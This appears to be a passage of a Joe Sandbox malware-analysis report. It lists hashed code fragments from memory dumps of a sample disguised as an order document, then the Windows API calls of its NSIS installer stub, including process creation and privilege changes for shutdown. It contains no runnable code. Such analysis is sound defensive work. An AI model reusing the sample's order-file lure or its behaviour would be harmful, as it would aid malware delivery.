                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7817fabce2ea360cd4ed6e6928073f2a521884d35216df2bf7ff793281b0da0f
                                                  • Instruction ID: 4a594d16a77e6e4d7e5357f0daf463604f6f139faeabe841d2f9794d50d5d48c
                                                  • Opcode Fuzzy Hash: 7817fabce2ea360cd4ed6e6928073f2a521884d35216df2bf7ff793281b0da0f
                                                  • Instruction Fuzzy Hash: 1131A231E102169BDB09CF64D85069EFBB2AF85310F508615E805BB341DB71DD96CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7cfa35fddb5f71a95be9b7a4c3783ec4b254967b3a423b4802bcb68176b5235f
                                                  • Instruction ID: 7cc5c3e7b90f43f09a5db917e3e02de78aed6b99c56205b36bfda9c3c124b48f
                                                  • Opcode Fuzzy Hash: 7cfa35fddb5f71a95be9b7a4c3783ec4b254967b3a423b4802bcb68176b5235f
                                                  • Instruction Fuzzy Hash: C9215C75F103159FDB00DF79D884BAEBBF2AB88310F208125E915E7390DB34DA428B90
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56b1cbdddf8813e2e095351e1b5bf1bc73af025e45f0396f5b4b19d481863e0a
                                                  • Instruction ID: 5639b18f630bae63e6a1a324c9633c1b2a3b57c4a1ec046d9cda5b38e4137608
                                                  • Opcode Fuzzy Hash: 56b1cbdddf8813e2e095351e1b5bf1bc73af025e45f0396f5b4b19d481863e0a
                                                  • Instruction Fuzzy Hash: B5212C75F103199FDB00DF69D884AAEBBF6BB88310F208025E905F7390EB35DA418B90
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3da9d1d946688228ac898fffae6147849364d25de65c52352f601788c5f112e
                                                  • Instruction ID: 3d4811fd91725cb8242405880736550a0351090e1d513781f041de8aa110c885
                                                  • Opcode Fuzzy Hash: e3da9d1d946688228ac898fffae6147849364d25de65c52352f601788c5f112e
                                                  • Instruction Fuzzy Hash: 80219130E0021A9BDB09CFA4D85069EB7B2FF85310F508619E805BB341DB71DC96CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a905731a170e5a9d19d2861fb6b0e00574478ba9546dcc411d259e9bb4208de1
                                                  • Instruction ID: 69866f5a36f22988f905d37c5d8eb97cbbd58fb047c8ee72a96b76d70e172d0e
                                                  • Opcode Fuzzy Hash: a905731a170e5a9d19d2861fb6b0e00574478ba9546dcc411d259e9bb4208de1
                                                  • Instruction Fuzzy Hash: 56212A31A102248FDB14EF78D958B9EB7F2AF89340F114169E406EB360DB36DD01CB90
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f2eef37945f00a6884e2ad65848ff516ff168d1675d3b7c05251bac1f0f03476
                                                  • Instruction ID: b584b21f11c3460694153657856583f744729d8302157d7363a2b64019966de4
                                                  • Opcode Fuzzy Hash: f2eef37945f00a6884e2ad65848ff516ff168d1675d3b7c05251bac1f0f03476
                                                  • Instruction Fuzzy Hash: 88219030E003159FDB19CFA8E4506DEB7B2AF89350F60861AE811BB290EB719D96CB45
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701295012.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_ad000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e18f3640e077d17259c85c8098d18d6cd0aa88a5851c981d472fac97547eb9a5
                                                  • Instruction ID: e228dbe4fddd35f9f8a3fc26a89f93a17cd044e58435ebc7697a28041b308d69
                                                  • Opcode Fuzzy Hash: e18f3640e077d17259c85c8098d18d6cd0aa88a5851c981d472fac97547eb9a5
                                                  • Instruction Fuzzy Hash: 4F21F275604204DFDB24DF94D9C0F26BBA1EB85314F24C56ED94A4F686C336D847CA62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5cd6768077df0b6546aac12f95deda81f3dcb3e3281332abd16a80bab9efe96b
                                                  • Instruction ID: 88efec9abbd1b509d5f0b9eb92bec76b482680e4a57e8def34893a1492a0409e
                                                  • Opcode Fuzzy Hash: 5cd6768077df0b6546aac12f95deda81f3dcb3e3281332abd16a80bab9efe96b
                                                  • Instruction Fuzzy Hash: 08218030E003159BCB18CFA8D45069EB7B2FF89300F60851AF811BB390EB71AC45CB55
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61de3bf15ce8635e62af299e5a77123ed8076f7035b967ea2b9ed65e44d77eeb
                                                  • Instruction ID: f63936438fe6404192f077dca7ba26968858cb076a675044fbd4314706017622
                                                  • Opcode Fuzzy Hash: 61de3bf15ce8635e62af299e5a77123ed8076f7035b967ea2b9ed65e44d77eeb
                                                  • Instruction Fuzzy Hash: 1B214A30B002149FEB24EB74D564BAE77F2AB59345F200468E006EB390DF368D61CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c235c88b773ecdf2417af65b914a4b38d70e2fb946009e9517b43b3d3ae69d0
                                                  • Instruction ID: d81ac8f099169ae0f9463c6e095f4752705c11d4e62f84d092c8d2ddd90587c3
                                                  • Opcode Fuzzy Hash: 9c235c88b773ecdf2417af65b914a4b38d70e2fb946009e9517b43b3d3ae69d0
                                                  • Instruction Fuzzy Hash: 0C219334A142219FEF65D728F884B5E3756EB95312F144924D006DB2A8EF34EC57CBD2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ad2595b2b3563c084fe5794277f1ce36682e640eaa33de1027d886b1919ab19
                                                  • Instruction ID: f8705621e585c75a606cba55bad010a7278323e0f54e7f8ef78c4032c49955b1
                                                  • Opcode Fuzzy Hash: 7ad2595b2b3563c084fe5794277f1ce36682e640eaa33de1027d886b1919ab19
                                                  • Instruction Fuzzy Hash: E5214A30B042149FEB18EB74E564BAE77F2AB58345F200468E506EB290DB368D60CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13b9967d12c805a689544b7cc82f04bd2311aba2c2be7281c61971c838975662
                                                  • Instruction ID: 23170f40de6e68571981dbb854ff189dc11db44afd9a3c61cfaee6adf1eefa20
                                                  • Opcode Fuzzy Hash: 13b9967d12c805a689544b7cc82f04bd2311aba2c2be7281c61971c838975662
                                                  • Instruction Fuzzy Hash: 2421E334A102148FDB54EB78D958AAE77F2AB88344F104569E406EB3A1DB36DD01CB94
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4bb9eafe209c9eb73c949814f562cefe779f18c1d7e5659c450c90dada38d99b
                                                  • Instruction ID: 1db219c265c0ff1342e5cd45de3c9a356c3ded7390412a1021b9ea23acf12aab
                                                  • Opcode Fuzzy Hash: 4bb9eafe209c9eb73c949814f562cefe779f18c1d7e5659c450c90dada38d99b
                                                  • Instruction Fuzzy Hash: 7A11C831E002258BFF669A79F5603AB3751DB89315F10467AC156CF283EF25CC9A8BC2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 20e5c57d9dfd9cac351762704795581fb9d296191c7440ac61d0153cf7bbded4
                                                  • Instruction ID: 95e2badd3110f9a51d477c74dd188efcfb857bd9de23cedba86492fd6c58b088
                                                  • Opcode Fuzzy Hash: 20e5c57d9dfd9cac351762704795581fb9d296191c7440ac61d0153cf7bbded4
                                                  • Instruction Fuzzy Hash: E211A730F002298BEF659A79E45476A3256EB89315F204A3ED006DF353DF21DC968BC1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d585d8f54ca8e88a8ff2d28dc54697eece9a994e65ac39682bf400d1db17edbe
                                                  • Instruction ID: 0fe8860acb86b9ee2ca9cb67ca2e6beff4e68f79ce670fddbcc6f1b56ed8ec1c
                                                  • Opcode Fuzzy Hash: d585d8f54ca8e88a8ff2d28dc54697eece9a994e65ac39682bf400d1db17edbe
                                                  • Instruction Fuzzy Hash: CE11A10AA1E3E14FEB13863D9CA53867FA18F43264B5840DBD0C5CF593E409880EC3A2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f7578389ed7df713403bdb8804bac0222ed5940056f7c524633f6f48be1f29e
                                                  • Instruction ID: d4550ee673b82d51a67cc629b28f7e292dbfd56a1c15c271a3566c27aac1ea22
                                                  • Opcode Fuzzy Hash: 2f7578389ed7df713403bdb8804bac0222ed5940056f7c524633f6f48be1f29e
                                                  • Instruction Fuzzy Hash: 4511A135B102289FDB58966DC828AAE7BE7EBC8750F104139D809E7344DE79DD0287D0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b7726aa85a8371ac9f065ff1438a61a1af6f13afe1b4bea2431060f8655b4d3f
                                                  • Instruction ID: 9c6012804a871eb298daa223957b726287365d72e8150e0ecbc71305f21d0b60
                                                  • Opcode Fuzzy Hash: b7726aa85a8371ac9f065ff1438a61a1af6f13afe1b4bea2431060f8655b4d3f
                                                  • Instruction Fuzzy Hash: B80124387002114FEB12863C8C51B5E7BE6EBCA320F64887AE40ACB381DA25DC0243A1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 89b68b6c856af76a352911845ee524788676f074bb2cdd4e8de511c94338a0bc
                                                  • Instruction ID: 9ab0fed6a8d408c2871f5b57bb090de8d0b66e333b54e5c53ba6ffaf145c84f6
                                                  • Opcode Fuzzy Hash: 89b68b6c856af76a352911845ee524788676f074bb2cdd4e8de511c94338a0bc
                                                  • Instruction Fuzzy Hash: 64018C38B042124FE7158679942535EBBD7DFCA314F34857AE14EDB345D961CD0287C5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53913847d160ce2ac04a08575a39dc548579515ec72b9648f97d3388b5abf41e
                                                  • Instruction ID: e7be8a73499b94d796bc9a5d7bbf5f15e941d4b9a25a55f966dff85a81f0a7aa
                                                  • Opcode Fuzzy Hash: 53913847d160ce2ac04a08575a39dc548579515ec72b9648f97d3388b5abf41e
                                                  • Instruction Fuzzy Hash: 5711C431E013799FCF25FFB8954019D7BF5EB58310B10057AE409E7242E735C9528791
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd5aeb0574dee690abf21195bd88ecf10f6ec0d11371edc9bed4d653ef9a707d
                                                  • Instruction ID: c98196f8b9da1adc36a68bad1a9d0b29453dc23c84dd79dd03de9e9d34edead2
                                                  • Opcode Fuzzy Hash: cd5aeb0574dee690abf21195bd88ecf10f6ec0d11371edc9bed4d653ef9a707d
                                                  • Instruction Fuzzy Hash: 1101F535B102299BDB549639C818BEF7BEBEBC9710F104035D805E3244DF64CD0287D2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701295012.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_ad000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fc4ba58f1966a399e11dd7e03ab5ef6b8f2f90470bc9f077ff7ad3a9af1751aa
                                                  • Instruction ID: eccbc1f5ab17621ec74d4b5a0c36c94acfca7b4f401605835441e32f43bb781e
                                                  • Opcode Fuzzy Hash: fc4ba58f1966a399e11dd7e03ab5ef6b8f2f90470bc9f077ff7ad3a9af1751aa
                                                  • Instruction Fuzzy Hash: AA11BB75504280DFCB15CF54D5C0B15BBA2FB85324F28C6AAD84A4BA56C33AD84ACB62
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 684a7c84225df72990d3372fd674f2f1a01ebecbeb50d15945e80bb14025155c
                                                  • Instruction ID: edf50052401997e93a95946945cf9a900b1768584f3763f988f4f304374007cd
                                                  • Opcode Fuzzy Hash: 684a7c84225df72990d3372fd674f2f1a01ebecbeb50d15945e80bb14025155c
                                                  • Instruction Fuzzy Hash: 5C01C031E002659FCF25FFB8A5401AD7BF5EB58310B20057AE409E7242E735C9528B91
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 241f4bf9982cc358cbd2f098c1859d291dd809f84aba78efaf3b90224c2e4240
                                                  • Instruction ID: 9da5f7fd38e2ac862562fd2a92b89df58bd8c722d777b59c591b6f555b614154
                                                  • Opcode Fuzzy Hash: 241f4bf9982cc358cbd2f098c1859d291dd809f84aba78efaf3b90224c2e4240
                                                  • Instruction Fuzzy Hash: 1901A938B001214BEB2496AD942171FB2DBDBCA724F30843AE10ECB345E961DD0243D1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f5174562434c227ce73873237f20eb560aab7f70eac54919a9438f4a3133dab
                                                  • Instruction ID: c406ddb1ba44a5627ea303da3e76a2ff855f18dde5d1fc1b856c0e0be3e20191
                                                  • Opcode Fuzzy Hash: 5f5174562434c227ce73873237f20eb560aab7f70eac54919a9438f4a3133dab
                                                  • Instruction Fuzzy Hash: E601AF397005119BEB25966D885572F77D6EBC9770F608839E50BDB384EE26DC0343D1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc59bdec52d6086d72b94c35b2a27501598c71ca999bdd5541e7db91aacad0c1
                                                  • Instruction ID: ea5ddcf31015e8f51d776e62b817929e950c29915f7b6233436f61a54eb502e7
                                                  • Opcode Fuzzy Hash: dc59bdec52d6086d72b94c35b2a27501598c71ca999bdd5541e7db91aacad0c1
                                                  • Instruction Fuzzy Hash: E5018C347001118FE710DA7CD8A9B5A77E6EB89750F318829E10BDB380EE26EC0287C1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 808d93e7b100e4804b32f36e3ad6164e50028dc95a8852529bef465d82a0367f
                                                  • Instruction ID: 6d55284df28c4a6be813cfb3c8f76104363e81deddba0352742d5629dc0d8e1c
                                                  • Opcode Fuzzy Hash: 808d93e7b100e4804b32f36e3ad6164e50028dc95a8852529bef465d82a0367f
                                                  • Instruction Fuzzy Hash: CCF0F635700234ABDB2956F9B82279A76D7DBC2321F04487DE409CB356DB22DC8B8791
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dad232b0357d5fbe518ea1cbe035b6e48cc1b1e9cb06202f9335bd48444a8961
                                                  • Instruction ID: c4f102ce46f4456dd0054be90481f38ecc7ba67fbde000982f62c1ecb3edd573
                                                  • Opcode Fuzzy Hash: dad232b0357d5fbe518ea1cbe035b6e48cc1b1e9cb06202f9335bd48444a8961
                                                  • Instruction Fuzzy Hash: 56F024347002349BDB2466BAF82276A76DBDBC2321F00483DE00ACB355DF21EC474791
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3e73b7fc3ff5c2f8d310569b41142c4181e22aa54c42d70f133a6c63bd6ffb1
                                                  • Instruction ID: dabc61a1df9f6e4f49d6a21236e0174b5f347cc0464c72a8756f04d9f040d849
                                                  • Opcode Fuzzy Hash: e3e73b7fc3ff5c2f8d310569b41142c4181e22aa54c42d70f133a6c63bd6ffb1
                                                  • Instruction Fuzzy Hash: 3EF06D71A0838AAFDB01CA74895964A7FB9DB03244F3444A6D444D7142E676CA118751
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7bff5a69ea5245ea6b6e2ed79e50d398040f488c3d9bb06950380d1280d0a764
                                                  • Instruction ID: df2d551836c8114d18a095f90e421ab0c3b3883b35eb7c3cf290045fad49db97
                                                  • Opcode Fuzzy Hash: 7bff5a69ea5245ea6b6e2ed79e50d398040f488c3d9bb06950380d1280d0a764
                                                  • Instruction Fuzzy Hash: FCD0A730205B209BC334D71CE148A53BBE9BB48710F954419F44783B40CB64FC11C7C0
                                                  APIs
                                                  • SetErrorMode.KERNEL32 ref: 00403688
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
                                                  • OleInitialize.OLE32(00000000), ref: 004037A3
                                                  • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037C2
                                                  • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
                                                  • CharNextW.USER32(00000000,00434000,00000020,00434000,00000000,?,00000008,0000000A,0000000C), ref: 00403810
                                                  • GetTempPathW.KERNEL32(00000400,00436800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
                                                  • GetWindowsDirectoryW.KERNEL32(00436800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                  • lstrcatW.KERNEL32(00436800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
                                                  • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
                                                  • lstrcatW.KERNEL32(00436800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00436800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
                                                  • DeleteFileW.KERNEL32(00436000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
                                                  • lstrlenW.KERNEL32(00436800,00434000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
                                                    • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                  • wsprintfW.USER32 ref: 00403AE4
                                                  • GetFileAttributesW.KERNEL32(0042C800,00436800), ref: 00403B17
                                                  • DeleteFileW.KERNEL32(0042C800), ref: 00403B23
                                                  • SetCurrentDirectoryW.KERNEL32(00436800,00436800), ref: 00403B51
                                                    • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
                                                  • CopyFileW.KERNEL32(00437800,0042C800,00000001,00436800,00000000), ref: 00403B67
                                                    • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405CAE
                                                    • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405CBB
                                                    • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(771B3420,00425F98,00425750,004060C2,00425750,00425750,00000000,00425750,00425750,771B3420,?,771B2EE0,00405DCE,?,771B3420,771B2EE0), ref: 00406A0A
                                                    • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
                                                  • ExitProcess.KERNEL32 ref: 00403BD2
                                                  • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BD9
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
                                                  • ExitProcess.KERNEL32 ref: 00403C7C
                                                    • Part of subcall function 00405C50: CreateDirectoryW.KERNEL32(?,00000000,00403658,00436800,00436800,00436800,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
